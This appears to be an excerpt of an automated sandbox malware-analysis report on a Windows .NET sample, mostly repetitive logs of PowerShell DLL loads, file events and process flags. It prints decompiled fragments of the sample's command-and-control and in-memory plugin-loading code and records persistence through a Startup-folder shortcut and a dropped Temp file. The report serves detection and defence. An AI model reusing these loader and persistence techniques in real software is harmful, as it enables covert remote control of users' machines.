                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                    Source: System.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\System
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: 2QaN4hOyJs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: 2QaN4hOyJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    .NET source code contains potential unpacker
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: 2QaN4hOyJs.exe, Messages.cs.Net Code: Memory
                                    Source: System.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: System.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: System.0.dr, Messages.cs.Net Code: Memory
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs.Net Code: Memory
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887C1D2A5 pushad ; iretd 2_2_00007FF887C1D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887D310A8 push E85B220Dh; ret 2_2_00007FF887D310F9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887E02316 push 8B485F92h; iretd 2_2_00007FF887E0231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887C0D2A5 pushad ; iretd 5_2_00007FF887C0D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887D219D3 pushad ; ret 5_2_00007FF887D219E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887DF2468 push ebx; ret 5_2_00007FF887DF2472
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF887DF2316 push 8B485F93h; iretd 5_2_00007FF887DF231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887BED2A5 pushad ; iretd 10_2_00007FF887BED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887DD2316 push 8B485F95h; iretd 10_2_00007FF887DD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF887C1D2A5 pushad ; iretd 12_2_00007FF887C1D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF887E059C8 push eax; iretd 12_2_00007FF887E059C9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF887E02316 push 8B485F92h; iretd 12_2_00007FF887E0231B
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Local\Temp\SystemJump to dropped file
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Local\Temp\SystemJump to dropped file
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnkJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnkJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
